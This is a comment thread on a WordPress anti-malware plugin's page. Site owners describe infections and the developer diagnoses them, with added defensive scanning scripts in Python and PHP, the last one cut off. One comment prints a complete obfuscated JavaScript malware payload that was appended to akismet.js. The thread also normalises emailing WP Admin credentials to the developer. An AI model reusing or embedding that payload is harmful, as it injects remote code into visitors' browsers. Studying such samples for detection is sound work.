Donations keep this Plugin alive! If you value this Plugin I urge you to donate as much as can so that I can keep it up-to-date and make it better. The more money I get, the more time I can devote to it, the more you benefit.
I installed your great plugin previously and it was working great. I updated WordPress and now your plug in is not showing up on my dashboard. Also, I tried installing and it says that the plugin already exists but I am not finding it. Can you please assist?
Does it show on the list of installed plugins? Is it the newest version? When you tried installing it and got the "already exists" error, what was the exact message you got?
If you want me to look at it for you please send me your WP Admin login.
I just installed your plug in but it didn't find any known threats but I do have a real compromised problem here. When I type in my website http://www.octaviaharris.com on sites like facebook or https://bitly.com/ the description and page text display weird text like this:
Isr med assoc j androl mccullough levine return of Levitra Viagra Vs Levitra Viagra Vs symptomatology from a nexus between the serum. Criteria service connection on erectile dysfunctionmen who have Price Of Cialis Price Of Cialis revolutionized the users of ejaculation? They remain the chronicity of diverse medical Cialis Cialis and minor pill communications.
It just started happening yesterday. Can your plug in help resolve my issue?
Thanks
It should be able to find this threat. If you have downloaded the latest definition update and it still does not find any known threats on a Complete Scan then you can send me your WP Admin login and I will find it for you and add it to my definition update so that it can be automatically detected and removed.
Hello,
My WP site was compromised. I went ahead and removed the PHP files via FTP that the plugin found. Would you please check things out to make sure that all is well now.
Thanking you in advance!
It looks alright from the outside. What was the file that you deleted?
If you have any reason to think you might still be infected and you want me to check it out from the inside I'll need your WP Admin login.
Hello,
I am having recurring issues with backdoor scripts? Can you please help me resolve this issue?
Send me your WP Admin login and I'll take a look. You can email the info directly to me: eli AT gotmls DOT net
Thanks for this AMAZING plugin
I have tried everything to reface my website
crescentcarco.com
Replaced every file, except the uploads folder *checked it manually*
Now my subpages work fine but my main page still redirects.
Can you PLEASE take a look at it? I will be obliged.
Thanks for sending me access credentials to your site and your server.
Got the home page fixed!
It turns out there was a text widget that was injected into your database. I'm not sure how the hacker did that, probably a database vulnerability at the hosting level, but it was easy to remove.
Please let me know if there is anything else I can do for you.
Dude you seriously ROCK
I also saw the entry of the text widget in the database, it looked suspicious and made no sense at all, but I was afraid to mess up the DB.
Once again thanks man, I really appreciate your help
Any advice on securing my site permanently? It gets defaced often.
Thanks
Numair
Thanks.
Protecting your site from future hacks is difficult because there are just so many ways that hackers will try to get in. In your case, because of the way the DB was hacked I would suggest moving to a more secure hosting environment. Cheap shared hosting is just so vulnerable to cross-site contamination, control panel breaches, and root server hacks.
I now offer very secure hosting for those that are getting too much attention from hackers and need a safer place to host their site. It's $12/month per site and there is no control panel. Let me know if you are interested.
Eli,
Thank you for the wonderful work you're doing and for this great plugin.
Three of my WP sites were hacked last week and the hacker's page and music (from Philippines) were inserted on my homepage. After a couple of days, Hostgator fixed it for me and warned me to always update my plugins and themes.
Today, the same hacker did his thing again, only it has affected more of my sites.
Thus, I downloaded your plugin and after scanning one site, it identified 4 potential viruses. Below is one of them.
Do you think this is the virus? I can give you admin access if that will help.
Thanks!
cap->create_posts ) )
wp_die( __( 'Cheatin' uh?' ) );
/**
* Press It form handler.
Thanks for sending me your WP Admin login credentials. I downloaded my definition updates and ran a Complete Scan on your site. Those potential threats are all ok. It looks like your site was defaced by a hacker using a vulnerability of your server or another compromised site on your shared host. There may be nothing you can do to stop an attack like this other than moving all your sites off that server.
The good news is that the damage is minimal and very easy to fix. The hacker has planted a file called index.html in the root directory of each infected site. WordPress uses a file called index.php so index.html is not needed and should be deleted. You can use your host's file manager or any FTP client to delete these infected index.html files easily. I have also updated the scan range of my plugin on your server to scan the whole public_html directory and all the sites in it. If all else fails you can use my plugin to find and delete these infected files. It will take a really long time to run a Complete Scan on all those sites but the option is now there if you need it.
Let me know if you need any more help.
Aloha, Eli
Thanks, Eli.
I'll do as you advised.
I've got some malicious virus on the website and ran your plugin which found 18 potential threats. A lot of index.php in different folders that just have one single script in each file (?). But I really don't know what to do now. How do I get rid of this malicious virus? Can you please go into the website and fix this? Would of course make a donation if the virus goes away.
Thanks,
Limp
Can you please email me with the WP Admin login for your site?
My direct email is: eli at gotmls dot net
hi i have the same issue please help
Have you registered my plugin and downloaded the latest definition updates?
If you have done this and my plugin still does not find any known threats then this could be a new type of infection that needs to be added to my definition update. As I told Limp Salas, if you send me your WP Admin login I will find it for you and add it to my definitions so that it can be automatically removed.
Hi
First off, I must say awesome plugin, but the thing is that I am facing daily WordPress post attacks like
and something suspicious
these kinds of attacks.
Do you have any plugin that solves these kind of issue on posts ??
Thanks
It sounds like this could be an SQL injection. You should try changing the login credentials to your DB. If the attacks continue at regular intervals check the log files at the time of the attack to see if you can spot the script file responsible for the injection.
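One way to do the log check suggested above, as an added example that is not part of the original thread: given the times at which the injected posts appeared, rank the PHP scripts that received a POST shortly before each one. The log lines, IP addresses, paths and attack times are constructed sample data, and the "combined" access-log format is an assumption about the server.

```python
import re
from datetime import datetime, timedelta, timezone

# Apache/nginx "combined" log format is assumed; adjust for other formats.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)

# Constructed sample log (documentation-range IPs, made-up script paths).
SAMPLE_LOG = [
    '198.51.100.7 - - [12/May/2013:03:14:58 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [12/May/2013:03:15:01 +0000] "POST /wp-content/uploads/2013/04/cache.php HTTP/1.1" 200 17 "-" "-"',
    '198.51.100.23 - - [12/May/2013:09:30:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [13/May/2013:03:14:40 +0000] "POST /wp-comments-post.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [13/May/2013:03:15:02 +0000] "POST /wp-content/uploads/2013/04/cache.php?x=1 HTTP/1.1" 200 17 "-" "-"',
    'this line is not in the expected format',
]

# Constructed attack times, e.g. the modification time of each injected post.
SAMPLE_ATTACKS = [
    datetime(2013, 5, 12, 3, 15, 5, tzinfo=timezone.utc),
    datetime(2013, 5, 13, 3, 15, 4, tzinfo=timezone.utc),
]


def parse_line(line):
    """Return a dict for one log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": m.group("path").split("?", 1)[0],  # drop the query string
        "status": int(m.group("status")),
    }


def rank_post_targets(lines, attack_times,
                      before=timedelta(minutes=2), after=timedelta(seconds=10)):
    """Rank PHP scripts by how many attacks they received a POST close to.

    A script that shows up next to every attack is the first one to inspect.
    Returns a list of (path, attacks_matched, sorted_client_ips).
    """
    matched = {}  # path -> (set of attack indexes, set of client IPs)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        if not rec["path"].lower().endswith(".php"):
            continue
        for idx, when in enumerate(attack_times):
            if when - before <= rec["ts"] <= when + after:
                attacks, ips = matched.setdefault(rec["path"], (set(), set()))
                attacks.add(idx)
                ips.add(rec["ip"])
    ranked = [(path, len(a), sorted(i)) for path, (a, i) in matched.items()]
    ranked.sort(key=lambda row: (-row[1], row[0]))
    return ranked


if __name__ == "__main__":
    for path, count, ips in rank_post_targets(SAMPLE_LOG, SAMPLE_ATTACKS):
        print(f"{count} attack(s)  {path}  from {', '.join(ips)}")
```
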
Something has infected all of my plugins on different sites. I am trying to run your plugin (which I reinstalled) and I am getting the message
"Another Plugin or Theme is using 'eva1fY2bak1cV2ir' to hadle output buffers.
This prevents actively outputing the buffer on-the-fly and will severely degrade the performance of this (and many other) Plugins.
Consider disabling caching and compression plugins (at least during the scanning process)."
I don't have any plugins running (as a result of the virus), so I can't figure out how to fix the issue with the output buffers. Any ideas? Right now it has checked 25 folders in 18 minutes with 4,407 folders left to go.
eva1fY2bak1cV2ir sounds like a malicious function that was hacked into your site to inject redirects or ads into the output of your pages. It is probably embedded in your theme or one of the core WordPress files. It may also be encoded so that you cannot easily search for it or tell what it's doing with your output.
It's obviously affecting the speed of your site if it's taking that long to scan. If my plugin does not find it when the scan finally finishes then you can send me your WP Admin login and I'll look for it for you.
You misspelled "handle":
Another Plugin or Theme is using 'eva1fY2bak1cV2ir' to hadle output buffers.
Thanks for pointing that out. That message has been misspelled this whole time and I didn't notice and nobody else has said anything until now. I'll have it corrected in my next release.
Hey Eli,
I noticed that all my sites I have your plugin installed on got a message alert that the wp-content/plugins/gotmls/safe-load.php file was changed. Did you do this or are the hackers trying to defeat your plugin?
Thanks…
That was me. I did upload a change to that file but did not release a new version so it shows up different.
Hello Eli
I am learning how to be a web master and have had to deal with these malware problems more and more lately. I love your anti malware program. Can I get you to look at our site and help me make sure there are no problems. This is a school website and I need to make sure the community can access this website safely.
My site http://www.cic-caracas.org is infected by malware. I have scanned using this plugin and confirmed and said it took care of some of the threats but listed 68 potential threats. What can I do about all of those? Please tell me how to remove all those or if it is necessary.
Thanks.
I would be happy to check your site for you. Can you send me your WP Admin login?
You can email the password info directly to: eli at gotmls dot net
Thanks for sending me the login. I did find one more threat in the footer, added it to the definition update, and removed the malicious code from that file.
Your site should be all clean now. You just need to go to your Google Webmaster Tools account and request a review in the Malware section to get rid of that warning from Google.
Please let me know if you need anything else.
Hi Eli,
Thank you for this great plugin! It fixed a lot of crap having entered my site, but yesterday I got a new one. All plugins disappeared, but still in the plugin directory. I removed everything to try to re-install, had a hunch so started with Anti-Malware to run a scan and it reported:
"Another Plugin or Theme is using 'eva1fY2bak1cV2ir' to hadle output buffers.
This prevents actively outputing the buffer on-the-fly and will severely degrade the performance of this (and many other) Plugins.
Consider disabling caching and compression plugins (at least during the scanning process)."
What is this "eva1fY2bak1cV2ir" – and how to get rid of it??
Br,
Stein
eva1fY2bak1cV2ir is a custom function that has taken over the output buffer on your site. I cannot say exactly what it does without seeing it, but I would guess it is filtering the content of your site to display only what the hacker wants to display (or it inserts content that the hacker wants to add to your site).
If you want to give me access to your site I will see if I can find it for you.
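A way to hunt for the output-buffer handler discussed in the two exchanges above, as an added example that is not the plugin's own code: it walks a site's PHP files, reports where the handler name appears literally, lists every ob_start() call with a non-built-in named callback, and lists files that combine eval() with a decoder, since the replies note the name may be encoded. The sample tree, file names and file contents are constructed; only the handler name comes from the quoted message.

```python
import os
import re
import tempfile

# ob_start('name') or ob_start("name") with a named callback
OB_START_RE = re.compile(r"""ob_start\s*\(\s*(['"])([A-Za-z_]\w*)\1""")
EVAL_RE = re.compile(r"\beval\s*\(")
DECODER_RE = re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(")
# Output handlers that ship with PHP itself
BUILTIN_HANDLERS = {"ob_gzhandler", "mb_output_handler", "ob_iconv_handler"}


def scan_tree(root, handler_name):
    """Scan *.php under root and return three sorted lists in a dict.

    literal         - files containing handler_name as plain text
    custom_ob_start - (file, line, callback) for non-built-in callbacks
    encoded         - files using eval() together with a decoder function,
                      where an encoded copy of the handler could be hiding
    """
    report = {"literal": [], "custom_ob_start": [], "encoded": []}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            if handler_name in text:
                report["literal"].append(rel)
            for lineno, line in enumerate(text.splitlines(), 1):
                for m in OB_START_RE.finditer(line):
                    if m.group(2) not in BUILTIN_HANDLERS:
                        report["custom_ob_start"].append((rel, lineno, m.group(2)))
            if EVAL_RE.search(text) and DECODER_RE.search(text):
                report["encoded"].append(rel)
    for key in report:
        report[key].sort()
    return report


# Constructed sample tree: harmless stand-ins for what a scan might meet.
SAMPLE_FILES = {
    "wp-content/themes/sample/functions.php": (
        "<?php\n"
        "function eva1fY2bak1cV2ir($buffer) { return $buffer; }\n"
        "ob_start('eva1fY2bak1cV2ir');\n"
    ),
    "wp-content/plugins/sample-cache/cache.php": '<?php ob_start("ob_gzhandler");\n',
    "wp-includes/sample-encoded.php": "<?php eval(base64_decode($placeholder));\n",
    "wp-content/themes/sample/style.css": "body { color: #000; }\n",
}


def demo():
    """Write SAMPLE_FILES to a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for rel, content in SAMPLE_FILES.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(content)
        return scan_tree(root, "eva1fY2bak1cV2ir")


if __name__ == "__main__":
    for section, rows in demo().items():
        print(section, rows)
```

An empty `literal` list together with entries under `encoded` is the case the replies describe: the handler is registered from decoded code, so those files are the ones to read by hand.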
Thanks a thousand Eli – new donation is done.
Thank you!
Please let me know if I can be of any further assistance.
Thanks so much for the great plugin. I have an issue with some Malware on our site. Sucuri says it found Malware, but your plugin and Wordfence both say the site is clean. However, both computers I accessed the site with ended up getting infected with the "system-care antivirus" malware, so I suspect this is what Sucuri is picking up. I am not sure what my next step should be or where to look in my files for suspicious code. Any suggestions would be greatly appreciated.
Thanks again,
Vicki
If you have my latest definition update and you are scanning your whole site and it's not finding anything then you may have a new virus that I have not yet identified. These threats are always evolving and adapting to avoid detection. Would you be willing to provide me with WP Admin access to your site? Then I can find it and update my definitions update so that it can be automatically repaired by my plugin.
Error message disappeared … seems that everything is OK afterall. Thanks!
Damir
Sometimes it takes a little while for Google to review your site and notice that it has been cleaned. For future reference, you can speed that process up by requesting a review in the Health section of Google's Webmaster Tools.
The plugin detects a normal code and says: Found 1 WP-Login Exploit
<?php
/**
* WordPress User Page
*
* Handles authentication, registering, resetting passwords, forgot password,
* and other user handling.
*
* @package WordPress
*/
/** Make sure that the WordPress bootstrap has run before continuing. */
require( dirname(__FILE__) . '/wp-load.php' );
———
is that a bug?
thanks
Thanks for asking this question. No, it is not a bug.
It is, as you say, normal code.
It is essentially the first line of code in every wp-login.php in every install of WordPress.
It is also extremely vulnerable to a brute-force attack.
Basically, if that wp-load.php file is included without certain protection, it can bring down your whole server. My plugin now has a patch for this file that stops the WordPress bootstrap from loading if it senses a brute-force attack. This was inspired by the wide-spread brute-force attacks that have been targeting WordPress login pages around the world for the past few weeks. These attacks have crippled servers and probably succeeded in stealing some passwords too. So my plugin looks for the absence of my patch and, if not found, classifies this file as Exploitable. Selecting this file to be fixed will automatically apply my patch, in much the same way as it patches older versions of timthumb.php that can be exploited to write malicious code to files on your server.
I hope this suitably explains why it is highlighting this "normal" part of any WordPress installation. Please feel free to contact me again, should you need any further explanation or assistance.
That explains why I thought this was coming up with a false positive. I see where some people were having issues logging back in after applying the fix. Is that fixed now? I don't want to apply the patch and then not be able to log back in.
Also, I have a couple of files that are written with an eval Base_64 statement in them. I sent the potential virus file to the creator of the plugin and asked if the code (machine code I couldn't decode) was legitimate. They said it was legit.
My question is how do we mark a file as not a virus after using your plugin?
Thanks again Eli for everything.
There were a few people who had a problem logging in after applying the first version of this login patch. This was because their servers had register_globals turned on and WordPress destroys session vars whenever register_globals is on. I have fixed this in the current patch and it works great at stopping these brute-force attacks.
If you have any false positives that come up because a plugin developer is trying to be sneaky or cryptic like a hacker then I can whitelist that code but only after I decrypt it and check it thoroughly to make sure it is really ok.
Great job Eli. The login script cleanse works great. Tried it on a test domain and no problems at all.
Thanks so much.
I'll get you the info on those false positives. I do have a couple of coders who like to hide what they did so most people don't steal their ideas and processes.
Roger
Hi Eli. I love your plug-in! But I just upgraded to 1.3.04.17 and even though the site is registered I am getting an error message on 'What to look for':
WP-Login Exploits
Registration of your Installation Key is required for this feature
but your Scan Setting Page also tells me:
Your Installation Key is Registered:
8d8f06a5f8d73d9a59ad6f993de2fac1
http://308gts.dorman-consulting.com
Your Definitions file is current.
Is this normal?
Jeff
I'm sorry you got conflicting information on that page. I had to disable that particular update because it was causing problems on some people's sites. I have just released a plugin update that resolves this issue. If you download the new version 1.3.04.19 then it should work correctly.
Please let me know if you still have any issues, Thanks.
Hello Eli, Just downloaded and ran your plug-in. It did find some malware and repaired on my site. Problem Is I still have an issue with my site Google is calling malware and has posted a warning. I would like to give you more info if you could look
Thanks
This is a common problem for people, after removing the malware you need to have Google review your site. There is a Malware page in the Health section of Google Webmaster tools where you can request a review.
let me know if you need any more help.
Hello,
Malware has completely messed up the appearance of my blog. I don't have a current backup so I'm trying desperately to restore my site without completely wiping it. I've run several scans from various sources and they all show different results. I've heard good things about your plugin so I'd love to use it but it shows no threats (but skipped about 1100 files). Am I out of luck or am I doing something wrong?
You're not out of luck because you just contacted the right person. You probably just have some new malware variant that I have not written a definition for yet. If you send me your WP Admin login I will get in there and find it for you, and add it to my definition update so that it can be automatically repaired.
Thanks for sending me your login info, and for the tip about the analytics plugin. I found the malicious code embedded in the main plugin file of the Google-Analyticator Plugin. I have added this new threat to my definitions update and repaired that file with my plugin. You can enable that Google-Analyticator Plugin again if you want to still use it.
I just stopped by to make my monthly donation.
Eli, keep up the good work, you're a godsend.
Mahalo
Jeff
Hi Eli,
Great plugin.
Can you please help me out? My site is infected with malware.
I have a Malware entry: MW:EXPLOITKIT:BLACKHOLE1. Can your plugin fix this entry?
I already scanned and 5 threats were found. However, http://sitecheck.sucuri.net/results/vonkatwork.nl still shows that my site is infected.
Thanks!
Sucuri shows you are clean now.
If you still need more help with anything send me your WP Admin login.
I got the same problem. I installed the plug in and ran the scan but nothing has changed, I still have the same problem. Here is what my antivirus warning is telling me:
URL:
http://movinghouston.com/wp/buy_sell/
Process:
C:\Program Files (x86)\Google\Chrome\App…
Infection:
JS:Iframe-AMW [Trj]
Thanks for providing a login to your admin. I added that new threat to my definitions update and then my plugin was able to remove it from the two files that were infected.
I also expanded the search range to include the root site and it found and cleaned two backdoor scripts that were probably responsible for planting the virus in the first place.
Your site is all clean now. Let me know if there is anything else you need.
Hi
I have a site bluemonkeyonline.net that is infected with malware which appears to come from bizwonk.com, as every time I load bluemonkeyonline.net, bizwonk.com appears in the lower left of the browser window. I have scanned and infected files have been located and quarantined and a number of potential threats have been found, but the site is still infected as on reload the domain bizwonk still appears. Am I doing something wrong?
Cheers….michael
It sounds like you have an iframe injection that is not being detected by my plugin. If you want to give me WP Admin access to your site I can find it and add it to my definitions so it can be automatically removed.
Hi Eli!
I really need help… I'm one of several administrators for this site: http://www.bryggerietsgymnasium.se. It's been blacklisted for a week so I decided to spend my weekend trying to solve the problems. Without success. I have installed Anti-Malware and another malware plugin and done a check with Sucuri, and I get different results everywhere. Sucuri results are that it doesn't show any problems but still have been blacklisted by Yandex. I have updated WordPress and all plugins. Anti-Malware results refer mostly to script files (23), both in WordPress and plugins (among them the other malware plugin!). I have been able to halve the problems by removing a lot of old posts but it's more tricky when it comes to pages. The other malware plugin finds problems everywhere…. Now I'm a bit desperate. Can you please help?
Thank you//Eva
I would be happy to take a look at it if you can send me a login to your WP Admin.
I have trouble that Avast software finds malware and blocks my site. I've tried almost 10 different check up software and sites that do that to find something, but they don't find anything. Is Avast just being stupid with my site or?
This is the second comment within a half hour that reports of such a problem with Avast!
I do not see any signs of infection on either site. So, this is either a very new/undetected virus that Avast has found, or something on both sites is giving off false positives to Avast.
If there is something new that has infected your site then it is certainly possible that my plugin (as well as others') has in fact missed it.
If you can come up with any details about this infection that might help me identify it I would be happy to take a closer look.
Hi, a visitor of my site discovered that his Avast! flagged it as containing malware. This plugin doesn't recognize any threats when I scanned through the files. Should I not worry or might there be something that this plugin cannot find?
Yours is one of two comments within a half hour of each other that highlight such a report about Avast!
I do not see any signs of infection on either site. So, this is either a very new/undetected virus that Avast has found, or something on both sites is giving off false positives to Avast.
If there is something new that has infected your site then it is certainly possible that my plugin (as well as others') has in fact missed it.
If you can come up with any details about this infection that might help me identify it I would be happy to take a closer look.
I just registered the first domain and wanted to run a scan to see if it does as advertised. if it does, I too want to be able to protect all my domains under two email addresses. I have one for my personal use and one that is a reseller account I put my clients sites in.
Cheers,
That sounds like a good plan. Do you have any infected site you are trying to get clean?
Let me know if I can be of any assistance.
So far I have used the scanner on three of my sites. Each time they found 2 known threats. When I clicked auto fix, it would fix one of the files, but not the other. What should I do next. Can I actually delete that file from the directory or no? Thanks for your help.
I would not delete the file unless you are sure it is not needed for your site to function. Usually these types of infections are just one line of malicious code that is injected into a core file that your site was already using and deleting that file will break your site. The trick is to remove the malicious code while preserving the integrity of the rest of the file. That said, there are sometimes files that are all bad and no good and not needed at all which you can delete but knowing the difference is the key. If my plugin cannot remove that second threat then it is probably due to the permissions on that file.
If you want I can take a look at it and fix it for you and give you more info. You can send login credentials directly to my email if you want me to check it out: eli at gotmls dot net
I was pretty psyched to discover your plug-in, installed it, started to run it when it appeared to get hung up. I logged out and now I have this error:
Fatal error: Unknown: Failed opening required '/data/26/2/24/8/2513008/user/2752766/cgi-bin/.php/sessions/sess_d46e1d1d9b1761f304069089014695a6' (include_path='.:/usr/services/vux/lib/php') in Unknown on line 0
I am very sad.
I just wanted to follow up from last week, and say thanks for providing the WP Admin and FTP logins I needed to get your issue resolved.
How has your site been running? It looks like it has stayed clean but I see it is still blacklisted on Google. You need to go to Google's Webmaster tools and request a review to clear that warning. Let me know if you need help with that.
Also, it looks like there are still vulnerable timthumb.php files in the themes of two other sites on your server. These are not viruses but they are still exploitable and could lead to another infection. My plugin can scan all the sites on your server at once and automatically upgrade those timthumb files to patch that vulnerability.
Please let me know if I can be of any further assistance.
Great product – just made a donation. Do you have any simple suggestions for new WordPress blogs to prevent malware, etc. I read somewhere to change categories and to make difficult passwords but I couldn't find the article again.
There is no golden solution to this general problem, but usually keeping WordPress up-to-date and making sure the theme and plugins you are using do not have any known vulnerabilities is a good start. It is also a good idea to run regular scans for mal-ware. I am working on a cron engine for scheduling automatic scans which will help with that.
I have never heard anything about changing categories but it couldn't hurt to have strong passwords (but these kinds of hacks usually don't need to use your password to get in).
Thanks for your donation. The more support I get, the more I can support this plugin and make it better and stronger against a wider variety of threats and vulnerabilities.
Hi Eli,
Awesome plugin and keep up the good work. Anyway, any chance to prevent the logo displayed in the menu links, I mean just like other plugins? Thanks again.
I think you are asking if it is possible to not show the Anti-Malware menu item.
If so you may want to look on the bottom-right of the Scan Settings page and change the "Menu Item Placement Options" setting to "Sub-Menu inside the Tools Menu Item".
If that is not what you are looking for then please try me again and I'll see what I can do to help.
I will definitely look forward to donation, if you really helped me out. As I wasted my money into SiteLock service, I have requested the refund, and after getting it I will donate the same amount to you…
Please help me ASAP.
I can help you now but I will need your WP Admin login to scan for this threat. When I find it I will add it to the definition update and it can then be removed automatically. Please send login credentials to eli at gotmls dot net or reply to this notification.
Hello, I just downloaded your plugin and my website mobile version seems to be redirecting to a Russian model website. Can your plug in fix this malware problem? We are more than happy to donate if it can.
It should find it and mark it as a Known Threat at which point you can click Automatically Repair to fix it.
If it does not find it, or it only finds Potential Threats, then I can help you locate the source of the infection and write a new definition so that it can be automatically removed.
Please let me know if you need further help. You can email your WP Admin credentials to eli at gotmls dot net if you want my direct help.
Is it possible to register more than one site, or do I need to create a different user profile for each site I'd like to scan?
If you use the same email address when registering the other sites then they will all fall under the same registration. If you have already registered some under other email addresses you can login to those accounts and transfer those domains you have already registered to your preferred email account.
Excellent. Thank you.
Hi Eli,
I ran a scan with your plugin, it found 2 security vulnerabilities in htaccess. Clicked repair, and then got 500 internal server error… now my site is down, can you help?
It looks like Sucuri already removed some injected code from those htaccess files. My plugin had found some remaining code left in pieces in those files and when it tried to remove the last few pieces of code it broke the file. This would not have happened if my plugin had scanned these htaccess files before Sucuri modified them (when the whole malicious redirect code was intact) or if Sucuri had removed all the injected code when they cleaned the file, but at least we know how it happened and I can try to accommodate this sort of thing in the future.
Thanks for giving me the chance to look at it all on your server. Please feel free to contact me if you need more help.
Hey Eli,
Great plugin, I am impressed so far at it finding some malicious scripts, but it reports this one as a potential threat, when I am pretty sure it is a threat
Basically everything from "var _0x4470=" onwards has been appended by a hacker/ malicious script.
Thanks
[script akismet.js]
jQuery(document).ready(function () {
jQuery('.akismet-status').each(function () {
var thisId = jQuery(this).attr('commentid');
jQuery(this).prependTo('#comment-' + thisId + ' .column-comment div:first-child');
});
jQuery('.akismet-user-comment-count').each(function () {
var thisId = jQuery(this).attr('commentid');
jQuery(this).insertAfter('#comment-' + thisId + ' .author strong:first').show();
});
});
var _0x4470=["x39x3Dx31x2Ex64x28x27x35x27x29x3Bx62x28x21x39x29x7Bx38x3Dx31x2Ex6Ax3Bx34x3Dx36x28x31x2Ex69x29x3Bx37x3Dx36x28x67x2Ex6Bx29x3Bx61x20x32x3Dx31x2Ex65x28x27x63x27x29x3Bx32x2Ex66x3Dx27x35x27x3Bx32x2Ex68x3Dx27x77x3Ax2Fx2Fx74x2Ex75x2Ex6Cx2Ex76x2Fx73x2Ex72x3Fx71x3Dx27x2Bx34x2Bx27x26x6Dx3Dx27x2Bx38x2Bx27x26x6Ex3Dx27x2Bx37x3Bx61x20x33x3Dx31x2Ex6Fx28x27x33x27x29x5Bx30x5Dx3Bx33x2Ex70x28x32x29x7D","x7C","x73x70x6Cx69x74","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","x72x65x70x6Cx61x63x65","","x5Cx77x2B","x5Cx62","x67"];eval(function (_0xa064x1,_0xa064x2,_0xa064x3,_0xa064x4,_0xa064x5,_0xa064x6){_0xa064x5=function (_0xa064x3){return _0xa064x3.toString(36);} ;if(!_0x4470[5][_0x4470[4]](/^/,String)){while(_0xa064x3–){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3–){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));
Thanks for reporting this. It does indeed look malicious. I will define it now and add it as a Known Threat so that it may be automatically repaired.
I just updated the definitions. Can you download the update and scan it again? It should now mark this threat as "Known" and give you the option to "Automatically Repair".
Please let me know how it works for you. Thanks!
Hey Eli,
Thanks for the reply, and diligently adding to the definitions.
I have removed these manually, so haven't been able to successfully get them to be removed with the scanner yet, but hopefully I will soon… well hopefully not actually, but you know what I mean.
I was thinking it would be good to be able to submit potential threat files to the definition too, so that jw player for example (a common plugin) isn't caught every time as it has an eval() in it…. that is apparently legit…?
I would be happy to submit my scripts to you from plugins… or just the links to plugins with eval() in their scripts, and you could then get the original for your definition and compare?
Thanks again.
C
Thanks. I understand. I have not had the time I need to go through and exempt all the legit uses of eval and the like. I do have a method for white-listing benign code that would otherwise come up as a potential threat but it will take some time for me to go through and list all the exceptions properly without allowing loopholes for the malicious code.
I've registered and donated to your site but can no longer log in to my WordPress admin page.
When I tried to update the definitions from the wordpress plugin section nothing happened (the rest of the registration section was in green).
Can you help please?
I would be happy to help. If you want to give me your WP Admin credentials I can login and try it.
I am sorry I have not made any donation yet. I just started trying the service you give. I have a problem that I can not solve yet. There is a "Found the document has moved here" note on the top left corner of my blog page. I think this is malware or a kind of virus. I tried to scan all the plugins, wp content and html but this software plugin does not seem to work.
Please help me; this malware is very disturbing and dangerous for my web blog and my computer.
I am looking forward to your support and help. Please…
Best regards
I'm willing to help you find this bug if you can give me your WP Admin credentials.
Did you ever find this problem? I have it too.
Heru never responded to me. If you are willing to give me access to your WP Admin then I will track this down for you, and add it to my definitions so that it can be automatically removed.
I found the problem. If you are logged into WordPress go to Appearance > Editor > on the right hand side click on "Theme Functions" (functions.php) > press Ctrl+F on your keyboard to bring up the search tab on the upper right hand side of your panel > search for smuss.net (or whatever website the "here" link brings you to; I'm talking about the "here" link that we are trying to get rid of on our pages) > The search will bring you to a URL. Mine brought me to "http://smuss.net/jquery-1.6.3.min.js" > delete the entire URL between the "" but leave the "" and update the page. Then the problem will be fixed.
If you are not logged into WordPress, extract your theme in a folder > open the theme folder > right click on functions.php > open file with Notepad > scroll to the bottom of the page > look about 15 lines up for the URL and delete it > click "save" under "file" in the menu > close Notepad. Then the problem will be fixed. If you do not see the URL near the bottom (approx. 15 lines up) then you will have to search for it in this file and delete it.
This took me awhile today to track down and fix so I hope this helps someone else other than me
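The manual search described in the comment above can be automated. This is an added example, not part of the original comment and not GOTMLS code: it lists hard-coded external `.js` URLs in a PHP file whose host is not on an allow-list. The function name, the allow-list and the sample file contents are constructed for illustration; only the smuss.net URL comes from the comment.

```php
<?php
// Added example: report external script URLs hard-coded in a theme PHP file.

/**
 * @param string   $source  contents of a PHP file (e.g. a theme's functions.php)
 * @param string[] $allowed hostnames the site is expected to load scripts from
 * @return array[] list of ['line' => int, 'url' => string, 'host' => string]
 */
function find_foreign_script_urls(string $source, array $allowed): array
{
    // Absolute or protocol-relative URL ending in .js, optional query string,
    // terminated by a quote, bracket, whitespace or end of line.
    $re = '~(?:https?:)?//[^\s"\'<>()]+?\.js(?:\?[^\s"\'<>()]*)?(?=[\s"\'<>()]|$)~i';
    $hits = [];
    foreach (preg_split('/\R/', $source) as $i => $line) {
        if (!preg_match_all($re, $line, $m)) {
            continue;
        }
        foreach ($m[0] as $url) {
            $host = strtolower((string) parse_url($url, PHP_URL_HOST));
            if ($host !== '' && !in_array($host, $allowed, true)) {
                $hits[] = ['line' => $i + 1, 'url' => $url, 'host' => $host];
            }
        }
    }
    return $hits;
}

// Constructed sample of a functions.php with one injected remote script.
$sample = <<<'SAMPLE'
<?php
wp_enqueue_script('jquery');
wp_enqueue_script('theme', get_template_directory_uri() . '/js/theme.js');
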